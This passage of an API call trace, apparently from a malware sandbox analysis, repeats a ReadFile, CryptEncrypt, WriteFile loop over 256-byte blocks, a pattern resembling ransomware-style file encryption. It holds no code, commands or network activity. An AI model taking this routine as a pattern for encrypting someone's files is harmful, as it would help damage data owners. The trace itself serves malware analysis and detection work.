lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.267] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.267] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.267] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.267] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.267] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.268] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.268] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.268] GetLastError () returned 0x0 [0162.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.268] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.268] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.268] GetLastError () returned 0x0 [0162.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.268] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.268] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.268] GetLastError () returned 0x0 [0162.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.268] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.268] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.268] GetLastError () returned 0x0 [0162.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.268] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.269] GetLastError () returned 0x0 [0162.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.269] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.269] GetLastError () returned 0x0 [0162.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.269] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.269] GetLastError () returned 0x0 [0162.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.269] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.269] GetLastError () returned 0x0 [0162.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.269] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.269] GetLastError () returned 0x0 [0162.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.269] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.269] GetLastError () returned 0x0 [0162.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.269] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.269] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.270] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.270] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.270] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.270] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.270] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.270] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.270] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.270] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.270] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.270] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.270] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.270] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.270] GetLastError () returned 0x0 [0162.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.271] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.271] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.271] GetLastError () returned 0x0 [0162.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.271] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.271] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.271] GetLastError () returned 0x0 [0162.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.271] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.271] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.271] GetLastError () returned 0x0 [0162.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.271] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.271] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.271] GetLastError () returned 0x0 [0162.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.271] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.271] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.271] GetLastError () returned 0x0 [0162.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.271] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.271] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.271] GetLastError () returned 0x0 [0162.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.272] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.272] GetLastError () returned 0x0 [0162.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.272] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.272] GetLastError () returned 0x0 [0162.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.272] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.272] GetLastError () returned 0x0 [0162.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.272] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.272] GetLastError () returned 0x0 [0162.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, 